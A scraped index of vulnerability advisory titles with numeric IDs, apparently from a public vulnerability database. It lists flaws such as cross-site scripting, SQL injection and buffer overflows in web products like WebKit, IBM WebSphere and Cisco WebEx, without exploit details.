[72849] WebGate eDVR Manager CVE-2015-2096 ActiveX Control Remote Code Execution Vulnerability [72843] Multiple WebGate Products CVE-2015-2100 Multiple Remote Stack Based Buffer Overflow Vulnerabilities [72841] WebGate WinRDS Multiple ActiveX Controls Multiple Stack Buffer Overflow Vulnerabilities [72839] WebGate WebEyeAudio ActiveX control CVE-2015-2093 Stack Buffer Overflow Vulnerability [72838] WebGate eDVR Manager ActiveX Controls CVE-2015-2098 Multiple Buffer Overflow Vulnerabilities [72835] WebGate eDVR Manager CVE-2015-2097 Multiple Stack Buffer Overflow Vulnerabilities [72834] WebGate Control Multiple ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities [72824] Cisco Unified Web Interaction Manager CVE-2015-0655 Cross Site Scripting Vulnerability [72820] Fortinet FortiMail Web Action Quarantine Release Feature Cross Site Scripting Vulnerability [72812] Drupal Ubercart Webform Integration Module Multiple Cross Site Scripting Vulnerabilities [72719] Cisco WebEx Meetings Server CVE-2015-0590 Information Disclosure Vulnerability [72688] Cisco Web Security Appliance CVE-2015-0628 Remote Security Bypass Vulnerability [72676] Drupal RESTful Web Services Information Disclosure Vulnerability [72663] Cisco Web Security Appliance CVE-2015-0623 Cross Site Scripting Vulnerability [72636] noVNC 'include/webutil.js' Session Hijacking Vulnerability [72561] Drupal Webform prepopulate block Module Cross Site Scripting Vulnerability [72493] Cisco WebEx Meetings Server CVE-2015-0589 Command Injection Vulnerability [72401] Roundcube Webmail CVE-2015-1433 Cross Site Scripting Vulnerability [72387] Xymon 'web/acknowledge.c' Remote Buffer Overflow Vulnerability [72373] Cisco WebEx Meetings Server CVE-2015-0597 User Enumeration Vulnerability [72371] Cisco WebEx Meetings Server CVE-2015-0596 Cross Site Request Forgery Vulnerability [72370] Cisco WebEx Meetings Server CVE-2015-0595 Information Disclosure Vulnerability [72331] WebKit CVE-2014-4477 Unspecified Memory Corruption Vulnerability [72330] WebKit CVE-2014-4479 Unspecified Memory Corruption Vulnerability [72329] WebKit CVE-2014-4476 Unspecified Memory Corruption Vulnerability [72301] WebSVN 'dl.php' Arbitrary File Access Vulnerability [72253] WebGUI Unspecified Cross Site Scripting Vulnerability [72189] Oracle WebCenter Content CVE-2015-0376 Remote Security Vulnerability [72135] Oracle WebLogic Server CVE-2014-6569 Remote Security Vulnerability [72104] WebsiteBaker 'modify.php' Cross Site Scripting Vulnerability [72068] Clorius Controls A/S Java Web Client CVE-2014-9199 Information Disclosure Vulnerability [72045] Mozilla Firefox/SeaMonkey Web Audio Denial of Service Vulnerability [72044] Mozilla Firefox/SeaMonkey WebRTC Memory Corruption Vulnerability [72012] Cisco WebEx Meetings Server CVE-2015-0583 Information Disclosure Vulnerability [71982] Cisco WebEx Meetings Server CVE-2014-8036 Security Vulnerability [71980] Cisco WebEx Meetings Server CVE-2014-8035 User Enumeration Vulnerability [71978] Cisco WebEx Meetings Server CVE-2014-8034 User Enumeration Vulnerability [71950] Cisco WebEx Meetings Server CVE-2014-8033 Authentication Bypass Vulnerability [71947] Cisco WebEx Meetings Server CVE-2014-8032 Encrypted Password Information Disclosure Vulnerability [71945] Cisco WebEx Meetings Server CVE-2014-8030 Cross Site Scripting Vulnerability [71943] Cisco WebEx Meetings Server CVE-2014-8031 Cross Site Request Forgery Vulnerability [71924] Microweber CMS 'Category.php' SQL Injection Vulnerability [71908] IBM WebSphere Service Registry and Repository CVE-2014-6179 Cross Site Scripting Vulnerability [71907] IBM WebSphere Service Registry and Repository CVE-2014-6178 Cross Site Scripting Vulnerability [71906] IBM WebSphere Service Registry and Repository Multiple Cross Site Request Forgery Vulnerabilities [71905] IBM WebSphere Service Registry and Repository CVE-2014-6186 Security Bypass Vulnerability [71904] IBM WebSphere Service Registry and Repository CVE-2014-6181 Information Disclosure Vulnerability [71903] IBM WebSphere Service Registry and Repository CVE-2014-6177 Access Bypass Vulnerability [71902] IBM WebSphere Service Registry and Repository CVE-2014-6180 HTML Injection Vulnerability [71901] IBM WebSphere Service Registry and Repository Multiple Cross Site Scripting Vulnerabilities [71900] IBM WebSphere Service Registry and Repository CVE-2014-6132 Cross Site Scripting Vulnerability [71899] IBM WebSphere Service Registry and Repository CVE-2014-6153 Information Disclosure Vulnerability [71898] IBM WebSphere Service Registry and Repository Local Security Bypass Vulnerability [71897] IBM WebSphere Service Registry and Repository Multiple Directory Traversal Vulnerabilities [71863] Zarafa WebAccess and WebApp CVE-2014-9465 Multiple Denial of Service Vulnerabilities [71858] Social Microblogging PRO 'Web Site' Field HTML Injection Vulnerability [71837] IBM WebSphere Application Server CVE-2014-6164 Information Disclosure Vulnerability [71836] IBM WebSphere Application Server XML External Entity Information Disclosure Vulnerability [71834] IBM WebSphere Application Server CVE-2014-8890 Remote Privilege Escalation Vulnerability [71827] Graylog2 CVE-2014-9217 LDAP Authentication Bypass Vulnerability [71728] IBM WebSphere Portal CVE-2014-6215 Unspecified Cross Site Scripting Vulnerability [71628] Drupal Piwik Web Analytics Module Information Disclosure Vulnerability [71620] Symantec Web Gateway CVE-2014-7285 Command Injection Vulnerability [71607] Multiple Asterisk Products WebSocket Server Denial of Service Vulnerability [71472] Drupal Webform Invitation Module Cross Site Scripting Vulnerability [71464] WebKit CVE-2014-1748 Unspecified UI Spoofing Vulnerability [71462] WebKit CVE-2014-4470 Unspecified Memory Corruption Vulnerability [71461] WebKit CVE-2014-4469 Unspecified Memory Corruption Vulnerability [71459] WebKit CVE-2014-4468 Unspecified Memory Corruption Vulnerability [71451] WebKit CVE-2014-4475 Unspecified Memory Corruption Vulnerability [71449] WebKit CVE-2014-4474 Unspecified Memory Corruption Vulnerability [71445] WebKit CVE-2014-4466 Unspecified Memory Corruption Vulnerability [71444] WebKit CVE-2014-4473 Memory Corruption Vulnerability [71442] WebKit CVE-2014-4472 Memory Corruption Vulnerability [71441] Microsoft Exchange Server Outlook Web Access CVE-2014-6326 Cross Site Scripting Vulnerability [71440] Microsoft Exchange Server Outlook Web Access CVE-2014-6325 Cross Site Scripting Vulnerability [71438] WebKit CVE-2014-4471 Unspecified Memory Corruption Vulnerability [71358] IBM WebSphere Portal CVE-2014-6093 Unspecified Cross Site Scripting Vulnerability [71276] WebsiteBaker Multiple Security Vulnerabilities [71259] RETIRED: Mozilla Firefox WEBM File Handling Integer Overflow Vulnerability [71193] Advantech WebAccess CVE-2014-8388 Stack Based Buffer Overflow Vulnerability [71144] WebKit CVE-2014-4459 Unspecified Memory Corruption Vulnerability [71142] WebKit CVE-2014-4462 Unspecified Memory Corruption Vulnerability [71137] WebKit CVE-2014-4452 Unspecified Memory Corruption Vulnerability [71096] Drupal Webform Component Roles Module Access Bypass Vulnerability [71093] Direct Web Remoting CVE-2014-5325 XML External Entity Injection Vulnerability [71031] SAP HANA Web-based Development Workbench CVE-2014-8667 Cross Site Scripting Vulnerability [71024] SAP Network Interface Router CVE-2014-8589 Denial of Service Vulnerability [70964] Trend Micro InterScan Web Security Virtual Appliance Multiple Information Disclosure Vulnerabilities [70955] RSA Web Threat Detection CVE-2014-4627 SQL Injection Vulnerability [70872] IBM WebSphere Commerce CVE-2014-4769 XML External Entity Information Disclosure Vulnerability [70870] IBM WebSphere Commerce CVE-2014-4834 XML External Entity Denial of Service Vulnerability [70859] Scalix Web Access Mail Administration Login Panel Cross Site Scripting Vulnerability [70857] Scalix Web Access XML External Entity Injection Vulnerability [70849] Cisco Unified Communications Manager Admin Interface Multiple Cross Site Scripting Vulnerabilities [70846] Cisco Unified Communications Manager Reports Interface Multiple Cross Site Scripting Vulnerabilities [70759] IBM WebSphere Portal CVE-2014-6125 Cross Site Request Forgery Vulnerability [70758] IBM WebSphere Portal CVE-2014-4814 Unspecified Denial of Service Vulnerability [70757] IBM WebSphere Portal CVE-2014-4808 Unspecified Remote Code Execution Vulnerability [70756] IBM WebSphere Portal CVE-2014-6126 Unspecified Cross Site Scripting Vulnerability [70755] IBM WebSphere Portal CVE-2014-4821 Information Disclosure Vulnerability [70700] Webasuyst Shop-Script 'phone number' Field HTML Injection Vulnerability [70684] WebPromoExperts For Android SSL Certificate Validation Security Bypass Vulnerability [70593] Panasonic Network Camera View WebVideoCam ActiveX Remote Code Execution Vulnerability [70588] IBM WebSphere MQ CVE-2014-4822 Local Information Disclosure Vulnerability [70582] IBM WebSphere Application Server CVE-2014-3021 Unspecified Information Disclosure Vulnerability [70463] Oracle WebLogic Server CVE-2014-6499 Remote Security Vulnerability [70449] Oracle WebLogic Server CVE-2014-6534 Remote Security Vulnerability [70421] IBM WebSphere MQ CVE-2014-6116 Authentication Bypass Vulnerability [70322] IBM WebSphere Portal CVE-2014-4761 Information Disclosure Vulnerability [70283] IBM Security Access Manager for Web CVE-2014-4809 Remote Denial of Service Vulnerability [70274] Nessus Web UI CVE-2014-7280 HTML Injection Vulnerability [70271] IBM WebSphere DataPower XC10 Appliance CVE-2014-3060 Local Information Disclosure Vulnerability [70270] IBM WebSphere MQ CVE-2014-4793 Security Bypass Vulnerability [70269] IBM WebSphere DataPower XC10 Appliance CVE-2014-3059 Local Information Disclosure Vulnerability [70268] BMC Track-It! '/TrackItWeb/Grid/GetData' SQL Injection Vulnerability [70255] Allomani Weblinks Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities [70254] AutoWeb 'noticias.php' SQL Injection Vulnerability [70239] IBM WebSphere Application Server CVE-2014-6174 Clickjacking Vulnerability [70234] Cisco WebEx Meetings Server CVE-2014-3400 Information Disclosure Vulnerability [70222] Google Android API WebView Component CVE-2014-7224 Remote Code Execution Vulnerability [70181] Cisco WebEx Meetings Server CVE-2014-3395 Arbitrary File Download Vulnerabilitiy [70175] Bacula-web 'joblogs.php' SQL Injection Vulnerability [70104] Symfony Web Profiler Cross Site Request Forgery Vulnerability [70050] Netgear WNR500 Router 'webproc' Local File Include Vulnerability [69984] WebKit CVE-2013-6663 Use-After-Free Multiple Memory Corruption Vulnerabilities [69981] IBM WebSphere Application Server CVE-2014-4770 Cross Site Scripting Vulnerability [69980] IBM WebSphere Application Server CVE-2014-4816 Cross Site Request Forgery Vulnerability [69976] WebKit CVE-2014-4415 Unspecified Memory Corruption Vulnerability [69975] WebKit CVE-2014-4414 Unspecified Memory Corruption Vulnerability [69973] WebKit CVE-2014-4412 Unspecified Memory Corruption Vulnerability [69970] WebKit CVE-2014-4411 Unspecified Memory Corruption Vulnerability [69966] WebKit CVE-2014-4410 Unspecified Memory Corruption Vulnerability [69937] WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability [69900] Exsoul Web Browser for Android SSL Certificate Validation Security Bypass Vulnerability [69899] Web Browser &amp [69883] webEdition 'file' Parameter Directory Traversal Vulnerability [69881] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities [69875] IBM Websphere Message Broker and Integration Bus CVE-2014-4819 Information Disclosure Vulnerability [69739] Cisco Unified Communications Manager Web Framework Cross Site Scripting Vulnerability [69735] Cisco IOS XR Software Command Line Interface (CLI) Information Disclosure Vulnerability [69734] IBM WebSphere Portal CVE-2014-4792 Arbitrary File Upload Vulnerability [69733] IBM WebSphere Portal CVE-2014-4762 Unspecified Cross Site Scripting Vulnerability [69556] McAfee Web Gateway CVE-2014-6064 Information Disclosure Vulnerability [69553] MyWebSQL 'index.php' Cross Site Scripting Vulnerability [69547] IBM Business Process Manager and WebSphere CVE-2014-3075 Arbitrary File Upload Vulnerability [69540] IBM Business Process Manager and WebSphere CVE-2014-4758 Security Bypass Vulnerability [69538] Advantech WebAccess CVE-2014-0992 Stack Based Buffer Overflow Vulnerability [69536] Advantech WebAccess CVE-2014-0991 Stack Based Buffer Overflow Vulnerability [69535] Advantech WebAccess CVE-2014-0990 Incomplete Fix Stack-Based Buffer Overflow Vulnerability [69534] Advantech WebAccess CVE-2014-0989 Incomplete Fix Stack-Based Buffer Overflow Vulnerability [69533] Advantech WebAccess CVE-2014-0988 Incomplete Fix Stack-Based Buffer Overflow Vulnerability [69532] Advantech WebAccess CVE-2014-0987 Incomplete Fix Stack Based Buffer Overflow Vulnerability [69531] Advantech WebAccess CVE-2014-0986 Incomplete Fix Stack Based Buffer Overflow Vulnerability [69529] Advantech WebAccess CVE-2014-0985 Incomplete Fix Stack Based Buffer Overflow Vulnerability [69516] WordPress Video Posts Webcam Recorder Plugin 'r_logout.php' Cross Site Scripting Vulnerability [69394] Aruba Networks Web Management Portal CVE-2014-2592 Arbitrary File Upload Vulnerability [69384] Barracuda Networks Web Security Flex Multiple HTML Injection Vulnerabilities [69382] Barracuda Networks Web Security Flex Multiple HTML Injection Vulnerabilities [69369] Zarafa WebAccess and WebApp '/tmp' Directory Multiple Local Information Disclosure Vulnerabilities [69362] Zarafa WebAccess and WebApp Incomplete Fix Multiple Local Information Disclosure Vulnerabilities [69298] IBM WebSphere Application Server CVE-2014-3083 Unspecified Information Disclosure Vulnerability [69297] IBM WebSphere Application Server CVE-2014-4767 Security Bypass Vulnerability [69296] IBM WebSphere Application Server CVE-2014-3070 Security Bypass Vulnerability [69291] OpenStack Horizon Host Aggregates Interface CVE-2014-3594 HTML Injection Vulnerability [69285] Cisco Webex MeetMeNow CVE-2014-3340 Local Directory Traversal Vulnerability [69223] WebKit APPLE-SA-2014-08-13-1 Multiple Unspecified Memory Corruption Vulnerabilities [69218] IBM WebSphere DataPower SOA Appliances CVE-2014-0852 Information Disclosure Vulnerability [69183] IBM WebSphere Real Time CVE-2014-3086 Unspecified Privilege Escalation Vulnerability [69171] Easy File Sharing Web Server Multiple HTML Injection Vulnerabilities [69047] IBM WebSphere Portal CVE-2014-4760 Open Redirection Vulnerability [69045] IBM WebSphere Portal CVE-2014-3102 Unspecified Cross Site Scripting Vulnerability [69044] IBM WebSphere Portal CVE-2014-4746 Information Disclosure Vulnerability [69042] IBM WebSphere Portal CVE-2014-0953 Unspecified Cross Site Scripting Vulnerability [69034] IBM Embedded WebSphere Application Server CVE-2014-3020 Local Privilege Escalation Vulnerability [69028] Barracuda Web Application Firewall CVE-2014-2595 Authentication Bypass Vulnerability [68931] Web Encryption Extension Unspecified Remote Code Execution Vulnerability [68929] IBM WebSphere Portal CVE-2014-3055 SQL Injection Vulnerability [68928] IBM WebSphere Portal CVE-2014-3057 Cross Site Scripting Vulnerability [68925] IBM WebSphere Portal Unified Task List Portlet Information Disclosure Vulnerability [68924] IBM WebSphere Portal CVE-2014-3054 Open Redirection Vulnerability [68911] Cisco WebEx Meetings Server CVE-2014-3304 Information Disclosure Vulnerability [68910] Cisco WebEx Meetings Server CVE-2014-3303 Information Disclosure Vulnerability [68904] Cisco WebEx Meetings Server 'user.php' Information Disclosure Vulnerability [68903] Cisco WebEx Meetings Server CVE-2014-3305 Cross Site Request Forgery Vulnerability [68894] Cisco WebEx Meetings Server CVE-2014-3301 Information Disclosure Vulnerability [68877] Cisco Security Manager Web Framework CVE-2014-3326 SQL Injection Vulnerability [68876] Siemens SIMATIC WinCC And PCS7 WebNavigator Server Information Disclosure Vulnerability [68838] Honeywell FALCON XLWeb Controllers Multiple Unspecified Cross Site Scripting Vulnerabilities [68837] Honeywell FALCON XLWeb Controllers CVE-2014-2717 Authentication Bypass Vulnerability [68828] Barracuda Web Filter HTML Injection Vulnerability [68782] Nessus Web UI CVE-2014-4980 Information Disclosure Vulnerability [68718] Advantech WebAccess CVE-2014-2365 Remote Code Execution Vulnerability [68717] Advantech WebAccess CVE-2014-2366 Remote Information Disclosure Vulnerability [68716] Advantech WebAccess CVE-2014-2367 Remote Authentication Bypass Vulnerability [68715] Advantech WebAccess CVE-2014-2368 Unsafe ActiveX Control Remote Security Weakness [68714] Advantech WebAccess CVE-2014-2364 Multiple Remote Stack Based Buffer Overflow Vulnerabilities [68682] Open Web Analytics Multiple Cross Site Scripting and Remote File Include Vulnerabilities [68680] IPython Notebook Websocket Hijacking Remote Code Execution Vulnerability [68675] Boat Browser WebView Class CVE-2014-4968 Remote Code Execution Vulnerability [68658] WEBMIS CMS Arbitrary File Upload Vulnerability [68649] Oracle WebLogic Server CVE-2014-4241 Remote Security Vulnerability [68644] Oracle WebLogic Server CVE-2014-4217 Remote Security Vulnerability [68641] Oracle WebLogic Server CVE-2014-4242 Remote Security Vulnerability [68634] Oracle WebLogic Server CVE-2014-4253 Remote Security Vulnerability [68629] Oracle WebLogic Server CVE-2014-4210 Remote Security Vulnerability [68623] Oracle WebLogic Server CVE-2014-4202 Remote Security Vulnerability [68616] Oracle WebLogic Server CVE-2014-4201 Remote Security Vulnerability [68609] Oracle WebCenter Portal CVE-2014-4211 Remote Security Vulnerability [68597] Oracle WebLogic Server CVE-2014-4267 Remote Security Vulnerability [68594] Oracle WebLogic Server CVE-2014-2479 Remote Security Vulnerability [68591] Oracle WebLogic Server CVE-2014-4254 Remote Security Vulnerability [68589] Oracle WebLogic Server CVE-2014-4256 Remote Security Vulnerability [68575] Oracle WebLogic Server CVE-2014-4255 Remote Security Vulnerability [68570] Oracle WebLogic Server CVE-2014-2480 Remote Security Vulnerability [68567] Oracle WebLogic Server CVE-2014-2481 Remote Security Vulnerability [68563] Oracle WebCenter Portal CVE-2014-4257 Remote Security Vulnerability [68548] Juniper Junos SRX Web Authentication Cross Site Scripting Vulnerability [68532] Puffin Web Browser for Android Address Bar Spoofing Vulnerability [68528] Fortinet Fortiweb Multiple Cross Site Scripting Vulnerabilities [68519] WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities [68503] Cisco WebEx Meetings Client File Transfer Functionality Arbitrary File Download Vulnerabilitiy [68502] Cisco WebEx Meetings Client File Sharing Functionality Remote Heap Buffer Overflow Vulnerability [68485] WAGO-I/O-System CODESYS WebVisu Password Information Disclosure Vulnerability [68418] Symbiose Webos 'path' Parameter Cross Site Scripting Vulnerability [68331] Cisco Unified Communications Domain Manager BVSMWeb CVE-2014-3300 Security Bypass Vulnerability [68329] WebKit CVE-2014-1369 Information Disclosure Vulnerability [68275] WebKit CVE-2014-1340 Unspecified Memory Corruption Vulnerability [68271] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [68258] Google Android API WebView Component CVE-2012-6636 Arbitrary Code Execution Vulnerability [68247] Zarafa WebAccess and WebApp Local Information Disclosure Vulnerability [68211] IBM WebSphere Application Server CVE-2014-3022 Unspecified Information Disclosure Vulnerability [68210] IBM WebSphere Application Server CVE-2014-0965 Unspecified Information Disclosure Vulnerability [68187] Intercom Web Kyukincho V3 CVE-2014-3881 Unspecified Cross Site Request Forgery Vulnerability [68186] Intercom Web Kyukincho V3 CVE-2014-2006 Unspecified Cross Site Scripting Vulnerability [68180] WordPress TimThumb WebShot Feature Arbitrary Code Execution Vulnerability [68146] Alaya Webdav Server Unspecified Security Bypass Vulnerability [68132] IBM Security Access Manager for Web and Mobile CVE-2014-3053 Authentication Bypass Vulnerability [68131] Webmin Usermin CVE-2014-3883 Remote Command Injection Vulnerability [68129] Webmin CVE-2014-3886 Cross Site Scripting Vulnerability [68118] Cisco WebEx Meetings Server CVE-2014-3296 Information Disclosure Vulnerability [68090] web2Project CVE-2014-3119 Multiple SQL Injection Vulnerabilities [68065] T-Mobile webConnect Manager sysauth Cookie Information Disclosure Weakness [68063] Cisco Adaptive Security Appliance WebVPN Portal Information Disclosure Vulnerability [68011] IBM WebSphere Portal CVE-2014-0910 Cross Site Scripting Vulnerability [68001] Cisco WebEx Meetings Server CVE-2014-3294 Information Disclosure Vulnerability [68000] Cisco Unified Communications Manager Java Interface SQL Injection Vulnerability [67924] Cisco Unified Communications Domain Manager BVSMWeb User Enumeration Vulnerability [67922] Cisco WebEx Meeting Server CVE-2014-3286 User Enumeration Vulnerability [67921] WebTitan 4.01 Multiple Security Vulnerabilities [67830] IPSwitch IMail Server WEB client Multiple HTML Injection Vulnerabilities [67790] Opera Web Browser Prior to 22.0 Multiple Unspecified Security Vulnerabilities [67775] WordPress Query Interface Plugin Unspecified Security Bypass Vulnerability [67755] Symantec Web Gateway CVE-2014-1652 Multiple Cross Site Scripting Vulnerabilities [67754] Symantec Web Gateway CVE-2014-1651 SQL Injection Vulnerability [67753] Symantec Web Gateway CVE-2014-1650 SQL Injection Vulnerability [67752] Symantec Web Gateway CVE-2013-5017 'SNMPConfig.php' Remote Command Injection Vulnerability [67720] IBM WebSphere Application Server CVE-2013-6323 Cross Site Scripting Vulnerability [67704] WebCalendar CVE-2013-1421 HTML Injection Vulnerability [67697] Drupal Webserver authentication Module Security Bypass Weakness [67692] webEdition CMS 'setup.php' CVE-2014-2302 Remote Command Execution Vulnerability [67689] webEdition CMS 'we_fs.php' CVE-2014-2303 SQL Injection Vulnerability [67652] IBM WebSphere Service Registry And Repository Unspecified Cross Site Scripting Vulnerability [67649] Webmin Usermin Popup Windows Multiple Cross Site Scripting Vulnerabilities [67647] Webmin Multiple Unspecified Cross Site Scripting Vulnerabilities [67644] SOS Webpages CVE-2014-3445 Unauthorized Access Vulnerability [67598] IBM Sametime Proxy Server and Web Client CVE-2014-3015 Cross Site Request Forgery Vulnerability [67579] IBM WebSphere Application Server CVE-2014-0891 Information Disclosure Vulnerability [67572] WebKit CVE-2014-1731 Unspecified Memory Corruption Vulnerability [67569] Cisco Security Manager Web Framework Cross Site Scripting Vulnerability [67555] Cisco Identity Services Engine Web Framework CVE-2014-3275 SQL Injection Vulnerability [67554] WebKit CVE-2014-1346 Cross-Origin Security Bypass Vulnerability [67553] WebKit Multiple Unspecified Memory Corruption Vulnerabilities [67542] Easy File Management Web Server Stack Buffer Overflow Vulnerability [67540] Easy Address Book Web Server Stack Buffer Overflow Vulnerability [67495] Cisco Unified Web and E-Mail Interaction Manager Session Identifiers Security Bypass Vulnerability [67464] Cisco Unified Web and E-Mail Interaction Manager CVE-2014-2192 Cross Site Scripting Vulnerability [67458] Cisco Unified Web and E-Mail Interaction Manager XML External Entity Injection Vulnerability [67438] UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability [67424] Cisco WebEx Business Suite 'meetinginfo.do' Information Disclosure Vulnerability [67421] IBM WebSphere Portal CVE-2014-0954 Unspecified Security Bypass Vulnerability [67419] IBM WebSphere Portal 'boot_config.jsp' Cross Site Scripting Vulnerability [67418] IBM WebSphere Portal CVE-2014-0959 Denial of Service Vulnerability [67417] IBM WebSphere Portal CVE-2014-0956 Cross Site Scripting Vulnerability [67415] IBM WebSphere Portal 'Social Rendering' Feature Cross Site Scripting Vulnerability [67414] IBM WebSphere Portal CVE-2014-0958 Open Redirection Vulnerability [67413] IBM WebSphere Portal CVE-2014-0949 Unspecified Denial of Service Vulnerability [67412] IBM WebSphere Portal 'FilterForm.jsp' Cross Site Scripting Vulnerability [67411] IBM WebSphere Commerce CVE-2014-0943 Denial of Service Vulnerability [67406] Easy File Sharing Web Server Stack Buffer Overflow Vulnerability [67398] Microsoft Debug Interface Access SDK 'msdia.dll' Memory Corruption Vulnerability [67335] IBM WebSphere Application Server CVE-2014-0859 Denial of Service Vulnerability [67329] IBM WebSphere Application Server CVE-2014-0823 Arbitrary File Disclosure Vulnerability [67328] IBM WebSphere Application Server Liberty Profile CVE-2014-0896 Information Disclosure Vulnerability [67327] IBM WebSphere Application Server CVE-2014-0857 Unspecified Information Disclosure Vulnerability [67322] IBM WebSphere Application Server CVE-2014-0964 Denial of Service Vulnerability [67290] Microsoft Office Web Apps CVE-2014-1813 Remote Code Execution Vulnerability [67269] Red Hat JBoss Web Framework Kit Multiple Cross Site Scripting Vulnerabilities [67264] Cisco WebEx ARF Player CVE-2014-2136 Memory Corruption Vulnerability [67262] Cisco WebEx ARF Player CVE-2014-2135 Memory Corruption Vulnerability [67261] Cisco WebEx ARF Player LZW Decompress Memory Corruption Vulnerability [67260] Cisco WebEx WRF Player WRF File Heap Overflow Vulnerability [67259] Cisco WebEx WRF and ARF Players CVE-2014-2132 Out of Bound Read Denial of Service Vulnerability [67238] IBM Security Access Manager for Web CVE-2014-0963 Remote Denial of Service Vulnerability [67237] Opera Web Browser Prior to 21.00 Multiple Unspecified Security Vulnerabilities [67235] Fortinet FortiWeb CVE-2014-3115 Multiple Cross Site Request Forgery Vulnerabilities [67209] StarTeam Web Server 'performCheckoutFile()' Function Information Disclosure Vulnerability [67207] IBM WebSphere MQ 'inetd' Process Denial of Service Vulnerability [67182] Netty 'WebSocket08FrameDecoder' Class Denial of Service Vulnerability [67143] Cisco WebEx Meetings Server CVE-2014-2186 Cross Site Request Forgery Vulnerability [67058] Acunetix Web Vulnerability Scanner Remote Stack Buffer Overflow Vulnerability [67056] InduSoft Web Studio CVE-2014-0780 Directory Traversal Vulnerability [66926] ZNC 'CWebAdminMod::ChanPage()' Function Denial of Service Vulnerability [66925] WebTitan Multiple Security Vulnerabilities [66922] Xerox DocuShare '/docushare/dsweb/ResultBackgroundJobMultiple/1' SQL Injection Vulnerability [66838] Oracle WebCenter Portal CVE-2014-0450 Information Disclosure Vulnerability [66825] Oracle WebLogic Server CVE-2014-2470 Remote Security Vulnerability [66806] Microweber Cross Site Request Forgery Vulnerability [66804] MicroWorld Technologies eScan Web Management 'pass' Parameter Remote Command Injection Vulnerability [66770] Juniper Junos J-Web CVE-2014-2711 HTML Injection Vulnerability [66767] Juniper Junos J-Web CVE-2014-2712 Multiple Cross Site Scripting Vulnerabilities [66760] Juniper Junos SRX Series Enhanced Web Filtering CVE-2014-2714 Denial of Service Vulnerability [66750] Advantech WebAccess CVE-2014-0771 Information Disclosure Vulnerability [66749] Advantech WebAccess CVE-2014-0772 Information Disclosure Vulnerability [66742] Advantech WebAccess CVE-2014-0773 Security Bypass Vulnerability [66740] Advantech WebAccess CVE-2014-0763 SQL Injection Vulnerability [66734] Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities [66733] Advantech WebAccess CVE-2014-0770 Stack-Based Buffer Overflow Vulnerability [66732] Advantech WebAccess CVE-2014-0768 Stack-Based Buffer Overflow Vulnerability [66731] Roundcube Webmail IP Check Security Bypass Vulnerability [66728] Advantech WebAccess CVE-2014-0767 Stack-Based Buffer Overflow Vulnerability [66725] Advantech WebAccess CVE-2014-0766 Stack-Based Buffer Overflow Vulnerability [66722] Advantech WebAccess CVE-2014-0765 Stack Based Buffer Overflow Vulnerability [66718] Advantech WebAccess CVE-2014-0764 Stack-Based Buffer Overflow Vulnerability [66712] OSIsoft PI Interface for DNP3 CVE-2013-2828 Local Denial of Service Vulnerability [66711] OSIsoft PI Interface for DNP3 CVE-2013-2809 Remote Denial of Service Vulnerability [66644] CA Erwin Web Portal CVE-2014-2210 Multiple Directory Traversal Vulnerabilities [66586] WebKit CVE-2014-1304 Unspecified Memory Corruption Vulnerability [66585] WebKit CVE-2014-1302 Unspecified Memory Corruption Vulnerability [66584] WebKit CVE-2014-1301 Unspecified Memory Corruption Vulnerability [66583] WebKit CVE-2014-1300 Unspecified Memory Corruption Vulnerability [66581] WebKit CVE-2014-1299 Unspecified Memory Corruption Vulnerability [66580] WebKit CVE-2014-1297 Unspecified Security Bypass Vulnerability [66579] WebKit CVE-2014-1313 Unspecified Memory Corruption Vulnerability [66578] WebKit CVE-2014-1312 Unspecified Memory Corruption Vulnerability [66577] WebKit CVE-2014-1311 Unspecified Memory Corruption Vulnerability [66575] WebKit CVE-2014-1310 Unspecified Memory Corruption Vulnerability [66574] WebKit CVE-2014-1309 Unspecified Memory Corruption Vulnerability [66573] WebKit CVE-2014-1308 Unspecified Memory Corruption Vulnerability [66572] WebKit CVE-2014-1307 Unspecified Memory Corruption Vulnerability [66565] Cisco Web Security Appliance HTTP Header Injection Vulnerability [66559] IBM WebSphere Portal CVE-2014-0901 Cross Site Scripting Vulnerability [66556] IBM WebSphere Portal CVE-2014-0828 Cross Site Scripting Vulnerability [66433] InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability [66377] Jorjweb 'id' Parameter SQL Injection Vulnerability [66350] BIGACE Web CMS SQL Injection and Local File Include Vulnerabilities [66333] IBM WebSphere MQ Internet Pass-Thru CVE-2013-5401 Denial of Service Vulnerability [66328] Webmin CVE-2012-4893 Multiple Cross Site Request Forgery Vulnerabilities [66295] Moodle Assignment Web Services Security Bypass Vulnerability [66285] Cisco WebEx Business Suite CVE-2014-0708 Information Disclosure Vulnerability [66270] Exsoul Web Browser for Android Arbitrary Remote Code Execution Vulnerability [66248] Webmin 'view.cgi' Cross Site Scripting Vulnerability [66243] WebKit Use-After-Free Remote Code Execution Vulnerability [66242] WebKit CVE-2014-1303 Heap Based Buffer Overflow Vulnerability [66193] McAfee Web Gateway Directory Traversal Vulnerability [66168] Drupal Webform Template Module Access Bypass Vulnerability [66088] WebKit Use-After-Free Multiple Memory Corruption Vulnerabilities [66076] Open Web Analytics 'owa_event' Parameter PHP Object Injection Vulnerability [66011] Atmail Webmail Cross Site Scripting and Cross Site Request Forgery Vulnerabilities [65955] IBM WebSphere Portal 'wcm.path.traversal.security' Security Bypass Vulnerability [65907] webERP 'SalesInquiry.php' SQL Injection Vulnerability [65897] IBM WebSphere MQ Telemetry CVE-2013-4054 Security Bypass Vulnerability [65800] WordPress Feedweb Plugin '_wp_http_referer' Parameter Cross Site Scripting Vulnerability [65781] WebKit CVE-2014-1270 Unspecified Memory Corruption Vulnerability [65780] WebKit CVE-2014-1269 Unspecified Memory Corruption Vulnerability [65779] WebKit CVE-2013-6635 Use After Free Memory Corruption Vulnerability [65778] WebKit CVE-2014-1268 Unspecified Memory Corruption Vulnerability [65747] Embedthis Goahead Webserver Multiple Denial of Service Vulnerabilities [65734] InterWorx Web Control Panel Cross Site Scripting Vulnerability [65701] Joomla! eXtplorer Standalone Interface Authentication Bypass Vulnerability [65695] Barracuda Networks Web Firewall Multiple HTML Injection Vulnerabilities [65690] IBM WebSphere eXtreme Scale And DataPower XC10 Information Disclosure Vulnerability [65660] Fortinet Fortiweb Multiple Security Vulnerabilities [65617] IBM WebSphere 